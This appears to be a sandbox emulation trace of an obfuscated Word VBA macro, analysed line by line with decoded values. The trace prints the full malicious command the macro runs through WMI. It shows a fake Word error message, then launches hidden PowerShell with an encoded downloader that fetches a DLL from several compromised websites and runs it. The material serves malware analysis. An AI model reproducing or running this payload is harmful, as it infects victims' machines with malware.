                                                                    OXSmB:

                                                                    110

                                                                    C22jnnyve59b2 = "x [ sh bx [ sh b" + Mid(Application.Name, 60 / 10, 1) + "x [ sh bx [ sh b"

                                                                    Mid

                                                                    Name

                                                                    Application

                                                                    111

                                                                    Goto rYDvv

                                                                    112

                                                                    Set GOSKJ = AOSGE

                                                                    AOSGE

                                                                    113

                                                                    Dim pblpJEP, yNTJYEFj, EFfaBWHC as Long

                                                                    114

                                                                    Dim OlVYDaAK as Word.Paragraph

                                                                    115

                                                                    Dim iVxnxGH() as Byte

                                                                    116

                                                                    For Each OlVYDaAK in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    117

                                                                    iVxnxGH = OlVYDaAK.Range

                                                                    Range

                                                                    118

                                                                    dscc = "sadsaccc" & OlVYDaAK.Range

                                                                    Range

                                                                    119

                                                                    yNTJYEFj = UBound(iVxnxGH) - 1

                                                                    UBound

                                                                    120

                                                                    pblpJEP = 0

                                                                    121

                                                                    Set bquxP = zIlZF

                                                                    zIlZF

                                                                    122

                                                                    Do Until yNTJYEFj > yNTJYEFj

                                                                    123

                                                                    If iVxnxGH(yNTJYEFj) = 46 Or yNTJYEFj = yNTJYEFj Then

                                                                    124

                                                                    dscc = "sasdsacc" & (pblpJEP / 2) + 1 & " to " & (yNTJYEFj / 2) + 1 & MidB$(iVxnxGH, pblpJEP + 1, yNTJYEFj - pblpJEP + 3)

                                                                    MidB$

                                                                    125

                                                                    pblpJEP = yNTJYEFj + 2

                                                                    126

                                                                    Endif

                                                                    127

                                                                    yNTJYEFj = yNTJYEFj + 2

                                                                    128

                                                                    Loop

                                                                    129

                                                                    Next

                                                                    Paragraphs

                                                                    129

                                                                    rYDvv:

                                                                    131

                                                                    Cew5ncdrgctcj = D72efu7a0how7es + C22jnnyve59b2 + Cyum5s6729q4h + wjnsc + T8m6rm0ljeoit

                                                                    132

                                                                    Goto tgyiIBI

                                                                    133

                                                                    Set yJRyW = IeEnJ

                                                                    IeEnJ

                                                                    134

                                                                    Dim FJGWlF, boTEsG, DAKdJA as Long

                                                                    135

                                                                    Dim kjSGfNWH as Word.Paragraph

                                                                    136

                                                                    Dim NTrejcdK() as Byte

                                                                    137

                                                                    For Each kjSGfNWH in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    138

                                                                    NTrejcdK = kjSGfNWH.Range

                                                                    Range

                                                                    139

                                                                    dscc = "sadsaccc" & kjSGfNWH.Range

                                                                    Range

                                                                    140

                                                                    boTEsG = UBound(NTrejcdK) - 1

                                                                    UBound

                                                                    141

                                                                    FJGWlF = 0

                                                                    142

                                                                    Set LVHhGsGJd = PRawGB

                                                                    PRawGB

                                                                    143

                                                                    Do Until boTEsG > boTEsG

                                                                    144

                                                                    If NTrejcdK(boTEsG) = 46 Or boTEsG = boTEsG Then

                                                                    145

                                                                    dscc = "sasdsacc" & (FJGWlF / 2) + 1 & " to " & (boTEsG / 2) + 1 & MidB$(NTrejcdK, FJGWlF + 1, boTEsG - FJGWlF + 3)

                                                                    MidB$

                                                                    146

                                                                    FJGWlF = boTEsG + 2

                                                                    147

                                                                    Endif

                                                                    148

                                                                    boTEsG = boTEsG + 2

                                                                    149

                                                                    Loop

                                                                    150

                                                                    Next

                                                                    Paragraphs

                                                                    150

                                                                    tgyiIBI:

                                                                    152

                                                                    Pey8y7gr_e6_y = K532dwnyk0pybrc(Cew5ncdrgctcj)

                                                                    153

                                                                    Goto urNCUFJBF

                                                                    154

                                                                    Set aekya = NDNfzBJJ

                                                                    NDNfzBJJ

                                                                    155

                                                                    Dim QyRiIm, WEIxlI, rZGGJBDEH as Long

                                                                    156

                                                                    Dim EvkuEA as Word.Paragraph

                                                                    157

                                                                    Dim ZFzwZcA() as Byte

                                                                    158

                                                                    For Each EvkuEA in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    159

                                                                    ZFzwZcA = EvkuEA.Range

                                                                    Range

                                                                    160

                                                                    dscc = "sadsaccc" & EvkuEA.Range

                                                                    Range

                                                                    161

                                                                    WEIxlI = UBound(ZFzwZcA) - 1

                                                                    UBound

                                                                    162

                                                                    QyRiIm = 0

                                                                    163

                                                                    Set Gownu = BLbjEJvG

                                                                    BLbjEJvG

                                                                    164

                                                                    Do Until WEIxlI > WEIxlI

                                                                    165

                                                                    If ZFzwZcA(WEIxlI) = 46 Or WEIxlI = WEIxlI Then

                                                                    166

                                                                    dscc = "sasdsacc" & (QyRiIm / 2) + 1 & " to " & (WEIxlI / 2) + 1 & MidB$(ZFzwZcA, QyRiIm + 1, WEIxlI - QyRiIm + 3)

                                                                    MidB$

                                                                    167

                                                                    QyRiIm = WEIxlI + 2

                                                                    168

                                                                    Endif

                                                                    169

                                                                    WEIxlI = WEIxlI + 2

                                                                    170

                                                                    Loop

                                                                    171

                                                                    Next

                                                                    Paragraphs

                                                                    171

                                                                    urNCUFJBF:

                                                                    173

                                                                    Set V5rp8m_1bqwi1poyk = CreateObject(Pey8y7gr_e6_y)

                                                                    CreateObject("winmgmts:win32_process")

                                                                    executed
                                                                    174

                                                                    Goto TQOflAN

                                                                    175

                                                                    Set arTLjQ = BeNoB

                                                                    BeNoB

                                                                    176

                                                                    Dim iqpwDAG, nSFIYBiG, KqVudsGK as Long

                                                                    177

                                                                    Dim wFpBJBJE as Word.Paragraph

                                                                    178

                                                                    Dim bKloWCbL() as Byte

                                                                    179

                                                                    For Each wFpBJBJE in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    180

                                                                    bKloWCbL = wFpBJBJE.Range

                                                                    Range

                                                                    181

                                                                    dscc = "sadsaccc" & wFpBJBJE.Range

                                                                    Range

                                                                    182

                                                                    nSFIYBiG = UBound(bKloWCbL) - 1

                                                                    UBound

                                                                    183

                                                                    iqpwDAG = 0

                                                                    184

                                                                    Set Mpmet = qqdsB

                                                                    qqdsB

                                                                    185

                                                                    Do Until nSFIYBiG > nSFIYBiG

                                                                    186

                                                                    If bKloWCbL(nSFIYBiG) = 46 Or nSFIYBiG = nSFIYBiG Then

                                                                    187

                                                                    dscc = "sasdsacc" & (iqpwDAG / 2) + 1 & " to " & (nSFIYBiG / 2) + 1 & MidB$(bKloWCbL, iqpwDAG + 1, nSFIYBiG - iqpwDAG + 3)

                                                                    MidB$

                                                                    188

                                                                    iqpwDAG = nSFIYBiG + 2

                                                                    189

                                                                    Endif

                                                                    190

                                                                    nSFIYBiG = nSFIYBiG + 2

                                                                    191

                                                                    Loop

                                                                    192

                                                                    Next

                                                                    Paragraphs

                                                                    192

                                                                    TQOflAN:

                                                                    194

                                                                    njcnja = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))

                                                                    Mid

                                                                    Len(" x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAx [ sh bBTx [ sh bAGx [ sh bUAx [ sh bVAx [ sh bAtx [ sh bAHx [ sh bYAx [ sh bQQx [ sh bBSx [ sh bAGx [ sh bkAx [ sh bYQx [ sh bBCx [ sh bAEx [ sh bwAx [ sh bZQx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIgx [ sh bBUx [ sh bADx [ sh bQAx [ sh bIgx [ sh bArx [ sh bACx [ sh bIAx [ sh bSwx [ sh bBkx [ sh bADx [ sh bYAx [ sh bIgx [ sh bApx [ sh bACx [ sh bAAx [ sh bKAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bB5x [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh bAAx [ sh bLQx [ sh bBGx [ sh bACx [ sh bAAx [ sh bJwx [ sh bByx [ sh bAGx [ sh bUAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bcgx [ sh bBZx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bMAx [ sh bWQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAFx [ sh bQAx [ sh bZQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBjx [ sh bAHx [ sh bQAx [ sh bTwx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBtx [ sh bACx [ sh b4Ax [ sh bSQx [ sh bBvx [ sh bACx [ sh b4Ax [ sh bRAx [ sh bBJx [ sh bACx [ sh bcAx [ sh bKQx [ sh bAgx [ sh bACx [ sh bkAx [ sh bOwx [ sh bAgx [ sh bACx [ sh bAAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bMAx [ sh bRQx [ sh bB0x [ sh bACx [ sh bAAx [ sh bIAx [ sh bA0x [ sh bADx [ sh bIAx [ sh bOAx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bBZx [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bcAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bYAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bgAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh b0Ax [ sh bZgx [ sh bAnx [ sh bAEx [ sh bUAx [ sh bTQx [ sh bAux [ sh bAGx [ sh b4Ax [ sh bRQx [ sh bBUx [ sh bACx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bZQx [ sh bByx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAHx [ sh bQAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bUwx [ sh bBZx [ sh bAHx [ sh bMAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bTQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAEx [ sh bUAx [ sh bUgx [ sh bBWx [ sh bAGx [ sh bkAx [ sh bQwx [ sh bBFx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bAAx [ sh bbwx [ sh bBJx [ sh bAEx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bdAx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBhx [ sh bAEx [ sh b4Ax [ sh bYQx [ sh bBnx [ sh bACx [ sh bcAx [ sh bKQx [ sh bApx [ sh bACx ) -> 27204

                                                                    executed
                                                                    195

                                                                    nnjasd = K532dwnyk0pybrc(njcnja)

                                                                    196

                                                                    Goto OgZqDzXrC

                                                                    197

                                                                    Set FSWADGB = SlFMhE

                                                                    SlFMhE

                                                                    198

                                                                    Dim fWUcJcE, bDqBloVC, OZDOK as Long

                                                                    199

                                                                    Dim JRtnBYH as Word.Paragraph

                                                                    200

                                                                    Dim pXRdBD() as Byte

                                                                    201

                                                                    For Each JRtnBYH in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    202

                                                                    pXRdBD = JRtnBYH.Range

                                                                    Range

                                                                    203

                                                                    dscc = "sadsaccc" & JRtnBYH.Range

                                                                    Range

                                                                    204

                                                                    bDqBloVC = UBound(pXRdBD) - 1

                                                                    UBound

                                                                    205

                                                                    fWUcJcE = 0

                                                                    206

                                                                    Set axZmGGE = TtNYEBE

                                                                    TtNYEBE

                                                                    207

                                                                    Do Until bDqBloVC > bDqBloVC

                                                                    208

                                                                    If pXRdBD(bDqBloVC) = 46 Or bDqBloVC = bDqBloVC Then

                                                                    209

                                                                    dscc = "sasdsacc" & (fWUcJcE / 2) + 1 & " to " & (bDqBloVC / 2) + 1 & MidB$(pXRdBD, fWUcJcE + 1, bDqBloVC - fWUcJcE + 3)

                                                                    MidB$

                                                                    210

                                                                    fWUcJcE = bDqBloVC + 2

                                                                    211

                                                                    Endif

                                                                    212

                                                                    bDqBloVC = bDqBloVC + 2

                                                                    213

                                                                    Loop

                                                                    214

                                                                    Next

                                                                    Paragraphs

                                                                    214

                                                                    OgZqDzXrC:

                                                                    216

                                                                    V5rp8m_1bqwi1poyk.Create nnjasd, Koy_r2oxzs1, X2yj58n39t50co

                                                                    SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwA,,) -> 0

                                                                    Koy_r2oxzs1

                                                                    X2yj58n39t50co

                                                                    executed
                                                                    217

                                                                    Goto ScLedvBEA

                                                                    218

                                                                    Set yktdUg = kxpwbBJF

                                                                    kxpwbBJF

                                                                    219

                                                                    Dim wEvDIdG, lqbmGD, elJkJIB as Long

                                                                    220

                                                                    Dim IVjOAGZe as Word.Paragraph

                                                                    221

                                                                    Dim FcotIf() as Byte

                                                                    222

                                                                    For Each IVjOAGZe in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    223

                                                                    FcotIf = IVjOAGZe.Range

                                                                    Range

                                                                    224

                                                                    dscc = "sadsaccc" & IVjOAGZe.Range

                                                                    Range

                                                                    225

                                                                    lqbmGD = UBound(FcotIf) - 1

                                                                    UBound

                                                                    226

                                                                    wEvDIdG = 0

                                                                    227

                                                                    Set sJtmJ = UYxXOcIJG

                                                                    UYxXOcIJG

                                                                    228

                                                                    Do Until lqbmGD > lqbmGD

                                                                    229

                                                                    If FcotIf(lqbmGD) = 46 Or lqbmGD = lqbmGD Then

                                                                    230

                                                                    dscc = "sasdsacc" & (wEvDIdG / 2) + 1 & " to " & (lqbmGD / 2) + 1 & MidB$(FcotIf, wEvDIdG + 1, lqbmGD - wEvDIdG + 3)

                                                                    MidB$

                                                                    231

                                                                    wEvDIdG = lqbmGD + 2

                                                                    232

                                                                    Endif

                                                                    233

                                                                    lqbmGD = lqbmGD + 2

                                                                    234

                                                                    Loop

                                                                    235

                                                                    Next

                                                                    Paragraphs

                                                                    235

                                                                    ScLedvBEA:

                                                                    237

                                                                    End Function

                                                                    Function Yw0lmj9uz2sfz0, APIs: 44, Strings: 37, Number of lines: 123, Relevance: 147.123
                                                                    APIsMeta Information

                                                                    JltZHC

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    hbrLsIIaJ

                                                                    MidB$

                                                                    iyOuxJbS

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    vcpiDgaED

                                                                    MidB$

                                                                    TVnICGBMg

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    HoDns

                                                                    MidB$

                                                                    Replace

                                                                    		Replace("wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh bx [ sh bx [ sh bsx [ sh bx [ sh bx [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh bx [ sh bpx [ sh bx [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b","x [ sh b",) -> winmgmts:win32_process Replace("x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAx [ sh bBTx [ sh bAGx [ sh bUAx [ sh bVAx [ sh bAtx [ sh bAHx [ sh bYAx [ sh bQQx [ sh bBSx [ sh bAGx [ sh bkAx [ sh bYQx [ sh bBCx [ sh bAEx [ sh bwAx [ sh bZQx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIgx [ sh bBUx [ sh bADx [ sh bQAx [ sh bIgx [ sh bArx [ sh bACx [ sh bIAx [ sh bSwx [ sh bBkx [ sh bADx [ sh bYAx [ sh bIgx [ sh bApx [ sh bACx [ sh bAAx [ sh bKAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bB5x [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh bAAx [ sh bLQx [ sh bBGx [ sh bACx [ sh bAAx [ sh bJwx [ sh bByx [ sh bAGx [ sh bUAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bcgx [ sh bBZx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bMAx [ sh bWQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAFx [ sh bQAx [ sh bZQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBjx [ sh bAHx [ sh bQAx [ sh bTwx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBtx [ sh bACx [ sh b4Ax [ sh bSQx [ sh bBvx [ sh bACx [ sh b4Ax [ sh bRAx [ sh bBJx [ sh bACx [ sh bcAx [ sh bKQx [ sh bAgx [ sh bACx [ sh bkAx [ sh bOwx [ sh bAgx [ sh bACx [ sh bAAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bMAx [ sh bRQx [ sh bB0x [ sh bACx [ sh bAAx [ sh bIAx [ sh bA0x [ sh bADx [ sh bIAx [ sh bOAx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bBZx [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bcAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bYAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bgAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh b0Ax [ sh bZgx [ sh bAnx [ sh bAEx [ sh bUAx [ sh bTQx [ sh bAux [ sh bAGx [ sh b4Ax [ sh bRQx [ sh bBUx [ sh bACx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bZQx [ sh bByx [ sh bACx [ sh bcAx [ sh bLAx [ 